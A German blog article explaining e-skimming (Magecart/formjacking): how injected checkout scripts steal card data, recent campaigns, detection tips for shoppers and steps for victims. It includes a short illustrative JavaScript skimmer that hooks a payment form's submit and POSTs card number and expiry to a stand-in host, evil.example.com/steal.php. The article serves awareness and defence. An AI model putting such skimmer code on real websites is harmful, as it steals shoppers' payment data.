E-Skimming: Wie Zahlungs- und Kreditkartendaten unbemerkt gestohlen werden und wie du dich davor schützen kannst

Web-Skimming oder E-Skimming, auch Digital-Skimming, Online-Card-Skimming, Formjacking oder MageCart genannt, bezeichnet eine Art von Cyberangriff, bei dem Cyberkriminelle bösartigen Code in Websites einschleusen, um Zahlungs- und Kreditkarteninformationen von Nutzern zu stehlen. Dies geschieht oft durch Kompromittierung von E-Commerce- oder anderen Websites, die Zahlungsabwicklungen durchführen.

Der bösartige Code wird verwendet, um Daten wie Kreditkartennummern, Ablaufdaten und Sicherheitscodes während des Bezahlvorgangs im Checkout eines Online-Shops abzufangen, sobald sie von Nutzern eingegeben werden. Diese gestohlenen Daten werden dann an die Angreifer übertragen und für betrügerische Zwecke verwendet.

Inhaltsverzeichnis

MERKE:

Web-Skimming-Angriffe sind clientseitige Angriffe, bei denen Code in einem Online-Shop oder auf einer Webseite platziert wird, um sensible Daten zu stehlen, die von Benutzern bzw. Kunden in Webformulare eingegeben werden. Diese clientseitigen Angriffe können monatelang unentdeckt bleiben.

Wie unterscheidet sich E-Skimming vom Skimming?

Skimming und E-Skimming sind Methoden zum Diebstahl von Zahlungsinformationen, sie unterscheiden sie lediglich in ihrer Art der Ausführung:

  1. Skimming: Skimming bezieht sich auf physische Diebstähle von Zahlungsinformationen, insbesondere von Kredit- oder Debitkarten. Dies kann durch das Manipulieren von Kartenlesegeräten an Geldautomaten, Tankstellen oder anderen Orten geschehen, um die Kartendaten der Opfer zu erfassen.
  2. E-Skimming: E-Skimming hingegen erfolgt online und bezieht sich auf das Abfangen von Zahlungsinformationen während eines Online-Zahlungsvorgangs. Angreifer infiltrieren die Zahlungsabwicklungssysteme von Online-Shops, um bösartigen Code einzuschleusen, der die eingegebenen Zahlungsinformationen der Kunden stiehlt, wenn diese online einkaufen. Die gestohlenen Daten werden dann an die Angreifer übermittelt, die sie für betrügerische Zwecke verwenden.

Aktuelle E-Skimming-Beispiele

In den vergangenen Jahren haben cyberkriminelle Gruppen wie MageCart ihre gleichnamigen E-Kartenskimmer in Zehntausende von Websites weltweit eingeschleust. Darunter waren Websites wie TicketMaster und British Airways. Bei den MageCart-Angriffen wurden Millionen von Kreditkarten gestohlen, die dann auf unterschiedliche Weise monetarisiert worden sind.

Im Jahr 2022 gab es über 9.000 MageCart-Angriffe auf E-Commerce-Websites. Ende 2022 waren immer noch 2.468 E-Commerce-Websites infiziert.

MERKE:

Magento war die primäre Open-Source-E-Commerce-Plattform, die ursprünglich mittels E-Skimming ins Visier genommen wurde. Daraus entstand der Name „Magecart“ (eine Kombination aus „Magento“ und „Warenkorb“), der sich auch auf die kriminelle Gruppe bezieht, die hinter den Angriffen steckt. Betroffen waren und sind davon aber auch CMS-Systeme wie WordPress oder E-Commerce-Plattformen wie Shopify

September 2023

BlackBerry entdeckt eine Kampagne entdeckt und sie als “Silent Skimmer” bezeichnet. Ziel waren schlecht gesicherte Online-Zahlungsunternehmen im asiatischen und amerikanischen Raum. Die Angreifer kompromittierten Webserver und nutzten vorhandene Schwachstellen aus. Mit Hilfe von Payment-Scraping-Mechanismen entwendeten sie sensible Finanzdaten von Benutzern auf den kompromittierten Websites.

Dezember 2023

Mit der Unterstützung nationaler Computer Security Incident Response Teams konnten Europol und seine Partner (Strafverfolgungsbehörden aus 17 Ländern und die Agentur der Europäischen Union für Cybersicherheit) im Rahmen einer zweimonatigen Aktion 443 Online-Händler darüber informieren, dass die Kreditkarten- oder Zahlungskartendaten ihrer Kunden durch digitale Skimming-Angriffe kompromittiert wurden.

Laut einem Bericht von Recorded Future dürften unterdessen Finanzunternehmen mit Sitz in Nordamerika und Europa für den Großteil der gestohlenen Zahlungskarten verantwortlich sein, die im Jahr 2023 gestohlen wurden und im Jahr 2024 bei Angriffen mit ausgefeilte technische Lösungen, differenzierte Arbeitsabläufen und Social-Engineering-Taktiken verwendet werden, um die regelbasierte Betrugserkennungen zu umgehen

Wie funktioniert E-Skimming?

1

Initial Compromise (Breach)

Angreifer erhalten über verschiedene Methoden Zugriff auf den Quellcode bzw. Server eines Online-Shops oder den Quellcode eines Drittanbieter-Tools, z. B. durch Ausnutzung von Schwachstellen, durch die Bereitstellung von Malware im Online-Shop oder durch die Verwendung gestohlener (oder gefälschter) Anmeldeinformationen.

2

Code-Injection

Angreifer schleusen bei einem First-Party-Angriff bösartigen Code in die Zahlungsabwicklungsseiten des Online-Shops oder der Website ein, um Zahlungskarteninformationen von Kunden zu erfassen, darunter Kredit- oder Debitkartennummern, CVV2-Codes und andere persönliche Daten.

Zielen die Angreifer beispielsweise auf Scripte (JavaScript) von Drittanbietern ab, die für die Bereitstellung und den Betrieb des Online-Shops erforderlich sind, spricht man von einem Third-Party-Angriff. Der bösartige Skimming-Code wird dabei in das Script eines Drittanbieters eingefügt und beim Aufruf der Website oder des Online-Shops vom Drittanbieter in den Browser des Shop- oder Website-Besuchers geladen.

Diese sogenannten Third-Party- bzw. JavaScript-Angriffe auf die Lieferkette nehmen zu, da Sicherheitsteams oder IT-Dienstleister oftmals nicht den Überblick über alle in ihren Websites und Online-Shops enthaltenen Skripte Dritter behalten. Diese Nachlässigkeit nutzen Angreifer aus, um bösartigen Code in die Lieferkette von Websites und Shops einzuschleusen.

3

Datenerfassung und -exfiltration

Die Datenerfassung erfolgt, wenn Benutzer oder Kunden ihre Kartendaten eingeben, um ihre Einkäufe auf manipulierten, kompromittierten Zahlungsseiten, einschließlich der Checkout-Seiten, abzuschließen. Der Schadcode sammelt heimlich die Informationen und verschlüsselt sie häufig, bevor sie an den Remote-Server des Angreifers gesendet werden. Betroffene Kunden wissen und bemerken es nicht, dass ihre Karten- bzw. Zahlungsdaten kopiert und abgegriffen wurden.

4

Monetarisierung

Die Angreifer verkaufen die erbeuteten sensiblen, wertvollen Zahlungsinformationen im Dark Web an andere Cyberkriminelle oder nutzen sie selbst, um betrügerische Transaktionen mit kopierten Kreditkartendaten und Zahlungsinformationen durchzuführen.

Warum sind E-Skimming-Angriffe schwer zu erkennen? Warum werden sie nicht bemerkt?

Um einer Entdeckung zu entgehen, verwenden digitale Skimmer Verschleierungstechniken, um den schädlichen Code zu verbergen. Der eingeschleuste Code wartet förmlich darauf, dass Benutzer Formulare mit ihren Kreditkartennummern, weiteren Kundendaten und Zahlungsinformationen ausfüllen. Die Informationen werden direkt vom Browser/Gerät des Benutzers an eine vom Angreifer kontrollierte Website übertragen.

Website- und Shop-Betreiber haben oft keinen Überblick darüber, was im Browser ihrer Benutzer passiert, wenn der clientseitige Code von Cyberkriminellen geändert wurde. Und da die böswilligen Skimmer die Funktionalität der Seite in der Regel nicht verändern, merken weder die Betreiber, dass ihre Seiten und Shops kompromittiert, noch die Nutzer, dass ihre Daten gestohlen wurden.

Bei den meisten E-Skimming-Angriffen dauert es mehrere Wochen oder Monate, bis sie erkannt werden.

Hier sind weitere Gründe, warum E-Skimming-Angriffe häufig nicht bemerkt und erkannt werden:

  1. Versteckter Code: Die bösartigen Codes werden oft geschickt in den Quellcode der Website eingebettet, sodass sie vor den Augen der Seitenbetreiber und Nutzer unsichtbar sind und nicht leicht entdeckt werden können.
  2. Passive Natur der Angriffe: Die meisten E-Skimming-Angriffe sind passiv, d. h. sie werden nur dann aktiviert, wenn ein Nutzer seine Zahlungsinformationen eingibt. Dadurch bleiben sie für eine beträchtliche Zeit unentdeckt, da sie nicht kontinuierlich Daten abfangen.
  3. Unauffällige Gestaltung: Da E-Skimming-Angriffe darauf abzielen, unauffällig zu sein, werden sie oft so gestaltet, dass sie keine offensichtlichen Anzeichen wie auffällige Pop-ups oder Umleitungen erzeugen, die Nutzer alarmieren könnten.
  4. Verschleierungstechniken: Angreifer können auch Techniken wie Verschleierungscodes oder Verschleierungsdienste verwenden, um ihre Aktivitäten zu verbergen und die Erkennung durch Sicherheitssoftware zu erschweren.

Insgesamt erfordert die Erkennung von E-Skimming-Angriffen eine Kombination aus proaktiven Sicherheitsmaßnahmen, regelmäßiger Überwachung von Websites und Zahlungssystemen sowie einer Sensibilisierung (Awareness) von Online-Händlern und Nutzern, um verdächtiges Verhalten zu erkennen und zu melden.

Bei präventiven Maßnahmen zur Verhinderung des E-Skimmings sind eindeutig die Online-Händler, die Website- und Online-Shop-Betreiber und die E-Commerce-Plattformen gefordert, ihre digitalen Angebote besser abzusichern.

Der Nutzer bzw. der Online-Shop-Kunde wird kaum in der Lage sein, die Teils sehr diffizil versteckten und verdeckten E-Skimming-Angriffe zu erkennen. Technisch ist er ebensowenig in der Lage, E-Skimming-Angriffe abzuwehren, da Angreifer mit sehr viel technischer Raffinesse client-seitige Sicherheitsmaßnahmen umgehen können.

Ein einfaches Code-Beispiel, wie E-Skimming in einem Online-Shop funktionieren könnte

Annahmen:

  • Der Online-Shop verwendet JavaScript für die Abwicklung von Zahlungen.
  • Ein Angreifer hat eine Schwachstelle im Shop ausgenutzt, um bösartigen Code einzuschleusen.

Beispielcode für einen simplen Online-Shop mit potenzieller E-Skimming-Lücke:

<!DOCTYPE html>
<html>
<head>
    <title>Der unsichere Online-Shop</title>
</head>
<body>
    <h1>Willkommen in unserem Shop!</h1>
    <p>Bitte geben Sie Ihre Zahlungsinformationen ein:</p>
    <form id="paymentForm" action="process_payment.php" method="post">
        <label for="creditCardNumber">Kreditkartennummer:</label><br>
        <input type="text" id="creditCardNumber" name="creditCardNumber"><br>
        <label for="expiryDate">Ablaufdatum:</label><br>
        <input type="text" id="expiryDate" name="expiryDate"><br>
        <button type="submit">Zahlung abschließen</button>
    </form>
    <script src="https://unsecure.example.com/evil-script.js"></script>
</body>
</html>

Der bösartige Code, den ein Angreifer eingefügen würde, könnte so aussehen:

// evil-script.js
// Das Absenden des Zahlungsformulars wird abgefangen
document.getElementById('paymentForm').addEventListener('submit', function(event) {
    // Erlangen der Zahlungsinformationen
    var creditCardNumber = document.getElementById('creditCardNumber').value;
    var expiryDate = document.getElementById('expiryDate').value;
    // Senden der gestohlenen Daten an den Server der Angreifer.
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://evil.example.com/steal.php', true);
    xhr.setRequestHeader('Content-Type', 'application/json');
    xhr.send(JSON.stringify({ creditCardNumber: creditCardNumber, expiryDate: expiryDate }));
    // Weiterleitung des Formulars zur tatsächlichen Zahlungsabwicklung.
    // Der Benutzer wird getäuscht und im Glauben gelassen, 
    // dass die Zahlung erfolgreich war.
    // In Wirklichkeit hat der Angreifer bereits die Daten gestohlen.
});

So kannst du E-Skimming-Angriffe erkennen

Um E-Skimming im Browser zu erkennen, kannst du verschiedene Maßnahmen ergreifen:

  1. Überprüfe die Netzwerkauslastung während des Zahlungsvorgangs mithilfe von Browser-Entwicklertools (Netzwerkanalyse-Tool) in Chrome oder Firefox. Unbeabsichtigte Netzwerkaktivitäten können auf E-Skimming hindeuten.
  2. Überprüfe die URL: Achte darauf, dass die URL der Website korrekt ist und keine ungewöhnlichen Zeichen oder Schreibfehler enthält. Oft kopieren Skimmer die echte Website und fügen dann ihre eigenen bösartigen Skripte ein, um Daten zu stehlen.
  3. Beobachte unerwartete Pop-ups oder Weiterleitungen: Wenn plötzlich unerwartete Pop-up-Fenster auftauchen oder du auf ungewöhnliche Weiterleitungen auf andere Websites stößt, könnte dies ein Zeichen für E-Skimming sein.
  4. Verwende sicherer Zahlungsmethoden: Verwende sichere Zahlungsmethoden wie Kreditkarten mit zusätzlicher Sicherheitsschicht wie 3D Secure. Diese bieten zusätzlichen Schutz gegen E-Skimming-Angriffe.
  5. Verwende virtuelle Kreditkarten oder Einmalzahlungsdienste: Einige Dienste bieten virtuelle Kreditkarten oder Einmalzahlungsgutscheine an, die nur für eine bestimmte Transaktion gültig sind. Diese können das Risiko von E-Skimming minimieren, da die verwendete Karteninformation nach der Transaktion ungültig wird.
  6. Suche nach Sicherheitssymbolen und Zertifikaten: Überprüfe, ob die Website Sicherheitssymbolen wie ein geschlossenes Vorhängeschloss in der Adressleiste oder ein SSL-Zertifikat hat. Diese zeigen an, dass die Website verschlüsselte Verbindungen verwendet, was das Risiko von E-Skimming verringert.
  7. Aktualisiere deine Software: Stelle sicher, dass dein Browser und deine Sicherheitssoftware auf dem neuesten Stand sind. Aktualisierte Software enthält oft Patches für Sicherheitslücken, die von Angreifern ausgenutzt werden könnten.
  8. Verwende Sicherheitserweiterungen: Installiere Browsererweiterungen oder Add-ons, die speziell für die Erkennung und Blockierung von bösartigen Skripten und Phishing-Versuchen entwickelt wurden.
  9. Überwache deine Kontoauszüge: Überwache regelmäßig deine Kontoauszüge und prüfe, ob unerwartete oder verdächtige Transaktionen auftreten. Wenn du verdächtige Aktivitäten bemerkst, informiere sofort deine Bank oder deinen Zahlungsanbieter.
  10. Vertraue deinem Instinkt: Wenn eine Website oder ein Bezahlvorgang ungewöhnlich erscheint oder dir ein ungutes Gefühl gibt, brich den Vorgang ab und suche nach alternativen sicheren Methoden, um deine Transaktion durchzuführen.
  11. Melde verdächtige Aktivitäten: Wenn du verdächtige Aktivitäten oder potenzielle E-Skimming-Angriffe vermutest, melde sie sofort den entsprechenden Behörden oder Organisationen, damit sie entsprechende Maßnahmen ergreifen können.

Was du tun kannst, wenn du Opfer eines E-Skimming-Angriffs geworden bist

Wenn du Opfer eines E-Skimming-Angriffs geworden bist, sind hier einige Schritte, die du unternehmen kannst:

  1. Melde den Vorfall sofort bei deiner Bank: Benachrichtige umgehend deine Bank über den Vorfall. Sperre die Kredit- oder Debitkarte. Fordere deine Bank dazu auf, die verdächtige Transaktionen zu überprüfen und unbefugte Zahlungstransaktionen zurückzubuchen oder zu ersetzen.
  2. Setze dich umgehend mit dem Kreditkartenunternehmen in Verbindung: Informiere schnellstmöglich das Kreditkartenunternehmen über den Vorfall. Sperre auch hier umgehend deine Kredit- oder Debitkarte. Fordere auch das Kreditkartenunternehmen dazu auf, die verdächtigen Transaktionen zu überprüfen und unbefugte Zahlungstransaktionen zurückzubuchen oder zu ersetzen.
  3. Erstatte Anzeige bei der Polizei.
  4. Überprüfe die Quelle des Angriffs: Versuche herauszufinden, wie der Angriff erfolgt ist, indem du die Sicherheitsprotokolle deiner eigenen Systeme, Geräte, Apps und die Kommunikation mit der betroffenen Website analysierst. Dies kann helfen, Schwachstellen zu identifizieren und zukünftige Angriffe zu vermeiden.
  5. Dokumentiere den Vorfall: Halte alle Informationen über den Vorfall, einschließlich Zeitpunkt, betroffener Website, Art der gestohlenen Informationen und eventuelle finanzielle Schäden, sorgfältig fest. Diese Informationen können dir später dabei helfen, den Vorfall zu klären und möglicherweise Schadensersatz zu erhalten.
  6. Aktiviere die Benachrichtigungen für deine Konten: Aktiviere Benachrichtigungen für deine Bankkonten und Kreditkarten, damit du sofort informiert wirst, wenn verdächtige Transaktionen auftreten.
  7. Ändere deine Passwörter: Ändere alle Passwörter für Online-Konten, die möglicherweise von dem Vorfall betroffen sein könnten. Dies gilt insbesondere für Konten, die mit der gestohlenen Zahlungsinformation verknüpft sind.
  8. Überprüfen deine Konten: Überprüfe deine Bankauszüge und Kreditkartenabrechnungen sorgfältig auf verdächtige Aktivitäten. Melde alle unbefugten Transaktionen sofort deiner Bank und dem Kreditkartengeber.
  9. Sichere alle Beweise die auf deinen Geräten (PC, Laptop, Tablet, Smartphone, Router) vorhanden sind. Sichere alle vergangenen Transaktionsdetails aus deinem Online-Banking-Account, Protokolle, Logfiles, App- und Geräteberechtigungen)
  10. Scanne deine Geräte auf Malware: Führe einen gründlichen Viren- und Malwarescan auf allen Geräten durch, die du für Online-Zahlungen verwendet hast, um sicherzustellen, dass keine bösartige Software vorhanden ist.
  11. Informiere die Verursacher (den Websiteoder Online-Shop-Betreiber): Informiere die Website, auf der der Vorfall stattgefunden hat, über den Betrug und den Mißbrauch deiner Daten, damit der Betreiber geeignete Maßnahmen ergreifen kann, um die Sicherheit zu verbessern und andere Benutzer zu schützen.
  12. Informiere die Datenschutzbehörde: Informiere die zuständige Datenschutzbehörde über den Vorfall, damit sie möglicherweise weitere Maßnahmen ergreifen kann, um andere zu schützen und den Vorfall zu untersuchen.
  13. Erwäge rechtliche Schritte: Wenn der Vorfall erhebliche finanzielle oder rechtliche Auswirkungen hat, solltest du möglicherweise rechtliche Schritte in Betracht ziehen, um Schadensersatz zu erhalten oder die Verantwortlichen zur Rechenschaft zu ziehen.

So kaufst du sicher online ein

Wenn du online und insbesondere bei kleineren Händlern einkaufst, solltest du immer besonders vorsichtig sein. Da du als Nutzer wohl eher nicht in der Lage bist, selbst ein vollständiges Website-Audit durchzuführen, kannst du nicht sicher sein, dass die Plattform nicht kompromittiert wurde.

Allerdings solltest du die Finger von Online-Shops lassen, wenn die Website den Eindruck erweckt, dass sie längere Zeit nicht gepflegt wurde (sie zeigt beispielsweise veraltete Informationen wie „Copyright 2018“) an. Die meisten Kompromittierungen passieren, weil das Content-Management-System (CMS) einer Website und ihre Plugins veraltet und anfällig sind.

Es gibt Tools, die auch in Websites eingebetteten Schadcode erkennen können. Die meisten Antivirenprodukte bieten eine Art Webschutz, der bösartige Domänen und IP-Adressen erkennt. Da Bedrohungsakteure jedoch ständig ihre Infrastruktur austauschen, ist es eine gute Idee, über eine Art heuristische Erkennung für bösartige JavaScript-Snippets zu verfügen.

Wie geht’s weiter in Sachen E-Skimming? Was kommt als Nächstes?

In weiteren Beiträgen zum Thema E-Skimming werde ich euch u.a. eine Reihe von Tools empfehlen, mit denen das Shoppen im Internet sicherer wird. Ausserdem werde ich explizit auf Sicherheitsmaßnahmen für E-Commerce-Anbieter und Online-Händler eingehen.

: )

Hinweis: Die in diesem Beitrag verwendeten Bilder wurden mit KI erstellt.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert